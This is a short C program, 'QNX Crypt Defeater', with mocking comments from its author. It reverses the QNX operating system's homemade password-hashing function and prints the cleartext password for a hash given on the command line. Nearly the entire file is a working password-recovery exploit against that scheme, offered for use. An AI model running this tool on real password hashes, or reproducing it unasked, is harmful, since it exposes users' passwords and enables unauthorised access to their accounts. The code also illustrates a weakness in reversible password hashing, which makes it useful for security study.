/* I'd like to thank the morons at QNX for writing their own crypt
function,
   and thus making this program possible.

for everyone who's interested, the crypt source is located here:
ftp://ftp.visi.com/users/hawkeyd/qnx/

take a look at the header of that source, also take a look at how they
actually overflow the bits[] array on accident...  I sure hope that's not
qnx's actual source.

-sean


See LICENSE for licensing information...yes..its gpl
*/

#include <stdlib.h>
#include <stdio.h>


// there was a bug in ascii2bin... 
// it's been fixed
static ascii2bin(short x)
{
  if (x>='0' && x<'A')
    return x-'0';
  if (x>='A' && x<'a')
    return (x-'A')+9;
  return (x-'a')+26+9;
}
char bits[77];

/* the uncryptor */
char *quncrypt(char *pw)
{
  static char newpw[14];
  int i;
  int j,rot;
  int bit,ofs;
  char salt[2];
  int temp;

  salt[0]=*pw++;
  salt[1]=*pw++;  //first 2 chars of pw is salt
  for (i=0;i<72;i++)
    bits[i]=0;
  for (i=0;i<12;i++)
    newpw[i]=ascii2bin(pw[i]);  //convert back to bin
  newpw[13]=0;
  rot=(salt[1]*4-salt[0])%128;  // here's all the salt does.  Set up
// a rotation

  // now we take the password bits, and put them into a 2 dimensional grid,
  // which then gets bitshifted around.. through salt

  for (i=0;i<12;i++)
  {
    for (j=0;j<6;j++)
    {
      bit=newpw[i]&(1<<j); // move password into bit grid
      bits[i*6+j]=bit?1:0; // in qnx's crypt, this overflows.. idiots.
    }
  }
 // bits[66]=1; //this was a hack here...  
 // bits[67]=0; //uncomment it back out if a specific pwd isn't working

  while (rot--)  // do the big rotate
  {
    bits[66]=bits[0];
    for (i=0;i<=65;i++)
      bits[i]=bits[i+1];
  }

  for (i=0;i<8;i++)
  {
    newpw[i]=0;
    for (j=0;j<7;j++)
    {
      bit=bits[i+j*8];
      newpw[i]|=(bit<<j);  // and compile the bit array back into text
    }
  }
  newpw[8]=0;  // only 8 bytes needed! wabam!
  return newpw;
}

int main(int argc, char *argv[])
{
  char *cr;

  if (argc!=2)
  {
    printf("QNX Crypt Defeater.. by Sean\n");
    printf("reverse [hashcode]\n");
    exit(0);
  }
  printf("Uncrypting...booya!\n");
  cr=quncrypt(argv[1]);
  printf("Cleartext:%s\n",cr);
}